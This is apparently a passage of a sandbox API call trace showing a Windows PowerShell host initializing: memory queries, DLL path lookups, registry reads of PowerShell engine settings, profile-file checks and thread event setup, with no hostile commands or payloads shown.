	[0413.191] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.191] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.194] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0413.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.194] CoTaskMemFree (pv=0x46ad10) 
	[0413.198] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0413.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.198] CoTaskMemFree (pv=0x46ad10) 
	[0413.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0413.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0413.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0413.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0413.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0413.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0413.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0413.630] VirtualQuery (in: lpAddress=0x26bae0, lpBuffer=0x26c9a0, dwLength=0x30 | out: lpBuffer=0x26c9a0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0413.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0413.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0413.636] VirtualQuery (in: lpAddress=0x26bae0, lpBuffer=0x26c9a0, dwLength=0x30 | out: lpBuffer=0x26c9a0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.636] VirtualQuery (in: lpAddress=0x26b330, lpBuffer=0x26c1f0, dwLength=0x30 | out: lpBuffer=0x26c1f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.636] VirtualQuery (in: lpAddress=0x26b330, lpBuffer=0x26c1f0, dwLength=0x30 | out: lpBuffer=0x26c1f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.981] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d938 | out: phkResult=0x26d938*=0x330) returned 0x0
	[0413.981] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d8bc, lpData=0x0, lpcbData=0x26d8b8*=0x0 | out: lpType=0x26d8bc*=0x1, lpData=0x0, lpcbData=0x26d8b8*=0x56) returned 0x0
	[0413.981] CoTaskMemAlloc (cb=0x5a) returned 0x4959f0
	[0413.981] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d88c, lpData=0x4959f0, lpcbData=0x26d888*=0x56 | out: lpType=0x26d88c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d888*=0x56) returned 0x0
	[0413.981] CoTaskMemFree (pv=0x4959f0) 
	[0413.981] RegCloseKey (hKey=0x330) returned 0x0
	[0413.982] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d938 | out: phkResult=0x26d938*=0x330) returned 0x0
	[0413.982] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d8bc, lpData=0x0, lpcbData=0x26d8b8*=0x0 | out: lpType=0x26d8bc*=0x1, lpData=0x0, lpcbData=0x26d8b8*=0x56) returned 0x0
	[0413.982] CoTaskMemAlloc (cb=0x5a) returned 0x4959f0
	[0413.982] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d88c, lpData=0x4959f0, lpcbData=0x26d888*=0x56 | out: lpType=0x26d88c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d888*=0x56) returned 0x0
	[0413.982] CoTaskMemFree (pv=0x4959f0) 
	[0413.982] RegCloseKey (hKey=0x330) returned 0x0
	[0413.982] CoTaskMemAlloc (cb=0x20c) returned 0x3d71c0
	[0413.982] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3d71c0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0413.983] CoTaskMemFree (pv=0x3d71c0) 
	[0413.983] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0413.983] CoTaskMemAlloc (cb=0x20c) returned 0x3d71c0
	[0413.983] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3d71c0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0413.983] CoTaskMemFree (pv=0x3d71c0) 
	[0413.983] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0413.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x26d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0413.984] SetErrorMode (uMode=0x1) returned 0x1
	[0413.984] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d8a0 | out: lpFileInformation=0x26d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0413.984] SetErrorMode (uMode=0x1) returned 0x1
	[0413.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x26d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0413.984] SetErrorMode (uMode=0x1) returned 0x1
	[0413.984] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d8a0 | out: lpFileInformation=0x26d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0413.984] SetErrorMode (uMode=0x1) returned 0x1
	[0413.984] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x26d690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0413.984] SetErrorMode (uMode=0x1) returned 0x1
	[0413.984] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d8a0 | out: lpFileInformation=0x26d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0413.984] SetErrorMode (uMode=0x1) returned 0x1
	[0413.985] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x26d690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0413.985] SetErrorMode (uMode=0x1) returned 0x1
	[0413.985] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d8a0 | out: lpFileInformation=0x26d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0413.985] SetErrorMode (uMode=0x1) returned 0x1
	[0413.985] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0413.985] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.985] CoTaskMemFree (pv=0x46ad10) 
	[0413.986] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0413.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.986] CoTaskMemFree (pv=0x46ad10) 
	[0413.989] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0413.989] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.989] CoTaskMemFree (pv=0x46ad10) 
	[0413.992] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0413.992] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.992] CoTaskMemFree (pv=0x46ad10) 
	[0413.997] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0413.997] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.997] CoTaskMemFree (pv=0x46ad10) 
	[0413.999] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x330
	[0413.999] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0413.999] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0413.999] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x300
	[0413.999] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x320
	[0413.999] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x308
	[0413.999] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0413.999] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x374
	[0413.999] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x378
	[0413.999] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x328
	[0413.999] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0413.999] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0414.002] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0414.002] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.002] CoTaskMemFree (pv=0x46ad10) 
	[0414.005] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0414.005] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x26da80 | out: lpMode=0x26da80) returned 1
	[0414.007] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0414.007] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.007] CoTaskMemFree (pv=0x46ad10) 
	[0414.011] SetEvent (hEvent=0x300) returned 1
	[0414.011] SetEvent (hEvent=0x330) returned 1
	[0414.011] SetEvent (hEvent=0x334) returned 1
	[0414.011] SetEvent (hEvent=0x338) returned 1
	[0414.011] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0414.013] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0414.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.014] CoTaskMemFree (pv=0x46ad10) 
	[0414.014] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d7d8 | out: phkResult=0x26d7d8*=0x350) returned 0x0
	[0414.014] RegQueryValueExW (in: hKey=0x350, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x26d75c, lpData=0x0, lpcbData=0x26d758*=0x0 | out: lpType=0x26d75c*=0x0, lpData=0x0, lpcbData=0x26d758*=0x0) returned 0x2

Thread:
	id = 205
	os_tid = 0x5e8


Thread:
	id = 216
	os_tid = 0xc3c


Thread:
	id = 396
	os_tid = 0x101c


Thread:
	id = 397
	os_tid = 0x1020


Thread:
	id = 472
	os_tid = 0x117c


Thread:
	id = 473
	os_tid = 0x1180

	[0370.907] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0396.213] LocalFree (hMem=0x3e7280) returned 0x0
	[0396.213] CloseHandle (hObject=0x31c) returned 1
	[0396.213] CloseHandle (hObject=0x13) returned 1
	[0396.214] CloseHandle (hObject=0xf) returned 1
	[0396.214] RegCloseKey (hKey=0x308) returned 0x0
	[0396.214] RegCloseKey (hKey=0x304) returned 0x0
	[0396.214] RegCloseKey (hKey=0x300) returned 0x0
	[0396.215] LocalFree (hMem=0x3e7250) returned 0x0
	[0396.215] RegCloseKey (hKey=0x320) returned 0x0
	[0400.134] RegCloseKey (hKey=0x320) returned 0x0
	[0404.713] RegCloseKey (hKey=0x324) returned 0x0
	[0404.713] RegCloseKey (hKey=0x31c) returned 0x0
	[0404.714] RegCloseKey (hKey=0x308) returned 0x0
	[0404.714] RegCloseKey (hKey=0x320) returned 0x0
	[0404.714] RegCloseKey (hKey=0x300) returned 0x0
	[0404.714] RegCloseKey (hKey=0x338) returned 0x0
	[0404.714] RegCloseKey (hKey=0x334) returned 0x0
	[0404.715] RegCloseKey (hKey=0x330) returned 0x0
	[0404.715] RegCloseKey (hKey=0x32c) returned 0x0
	[0404.715] RegCloseKey (hKey=0x328) returned 0x0
	[0410.240] RegCloseKey (hKey=0x370) returned 0x0
	[0410.240] RegCloseKey (hKey=0x36c) returned 0x0
	[0410.241] RegCloseKey (hKey=0x368) returned 0x0
	[0410.241] RegCloseKey (hKey=0x364) returned 0x0
	[0410.241] RegCloseKey (hKey=0x324) returned 0x0
	[0410.241] RegCloseKey (hKey=0x37c) returned 0x0
	[0410.242] RegCloseKey (hKey=0x35c) returned 0x0
	[0410.242] RegCloseKey (hKey=0x358) returned 0x0
	[0410.242] RegCloseKey (hKey=0x354) returned 0x0
	[0410.242] RegCloseKey (hKey=0x350) returned 0x0
	[0410.243] RegCloseKey (hKey=0x34c) returned 0x0
	[0410.243] RegCloseKey (hKey=0x348) returned 0x0
	[0410.243] RegCloseKey (hKey=0x344) returned 0x0
	[0410.243] RegCloseKey (hKey=0x328) returned 0x0
	[0410.243] RegCloseKey (hKey=0x378) returned 0x0
	[0410.244] RegCloseKey (hKey=0x374) returned 0x0
	[0410.244] RegCloseKey (hKey=0x31c) returned 0x0
	[0410.244] RegCloseKey (hKey=0x308) returned 0x0
	[0410.244] RegCloseKey (hKey=0x320) returned 0x0
	[0410.245] RegCloseKey (hKey=0x300) returned 0x0
	[0410.245] RegCloseKey (hKey=0x338) returned 0x0
	[0410.245] RegCloseKey (hKey=0x334) returned 0x0
	[0410.245] RegCloseKey (hKey=0x330) returned 0x0
	[0410.246] RegCloseKey (hKey=0x32c) returned 0x0
	[0641.450] RegCloseKey (hKey=0x350) returned 0x0

Thread:
	id = 617
	os_tid = 0xff0

	[0414.706] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0414.710] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0414.715] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0414.715] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.715] CoTaskMemFree (pv=0x46ad10) 
	[0414.716] VirtualQuery (in: lpAddress=0x1c85d9e0, lpBuffer=0x1c85e8a0, dwLength=0x30 | out: lpBuffer=0x1c85e8a0*(BaseAddress=0x1c85d000, AllocationBase=0x1bed0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0414.719] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0414.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.720] CoTaskMemFree (pv=0x46ad10) 
	[0414.722] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0414.722] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.722] CoTaskMemFree (pv=0x46ad10) 
	[0414.725] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0414.725] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.725] CoTaskMemFree (pv=0x46ad10) 
	[0414.737] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0414.737] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.737] CoTaskMemFree (pv=0x46ad10) 
	[0414.740] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0414.740] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.740] CoTaskMemFree (pv=0x46ad10) 
	[0414.741] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0414.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.741] CoTaskMemFree (pv=0x46ad10) 
	[0415.144] VirtualQuery (in: lpAddress=0x1c85dc90, lpBuffer=0x1c85eb50, dwLength=0x30 | out: lpBuffer=0x1c85eb50*(BaseAddress=0x1c85d000, AllocationBase=0x1bed0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0415.145] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0415.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.145] CoTaskMemFree (pv=0x46ad10) 
	[0415.148] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0415.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.148] CoTaskMemFree (pv=0x46ad10) 
	[0415.148] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0415.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.148] CoTaskMemFree (pv=0x46ad10) 
	[0415.150] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0415.150] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.150] CoTaskMemFree (pv=0x46ad10) 
	[0415.153] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0415.153] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.154] CoTaskMemFree (pv=0x46ad10) 
	[0415.483] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0415.483] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.483] CoTaskMemFree (pv=0x46ad10) 
	[0415.485] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0415.485] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.486] CoTaskMemFree (pv=0x46ad10) 
	[0415.487] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0415.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.487] CoTaskMemFree (pv=0x46ad10) 
	[0415.489] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0415.489] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.489] CoTaskMemFree (pv=0x46ad10) 
	[0415.491] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0415.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.491] CoTaskMemFree (pv=0x46ad10) 
	[0415.492] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0415.492] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.492] CoTaskMemFree (pv=0x46ad10) 
	[0415.493] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0415.494] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.494] CoTaskMemFree (pv=0x46ad10) 
	[0415.508] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0415.508] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.508] CoTaskMemFree (pv=0x46ad10) 
	[0416.257] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
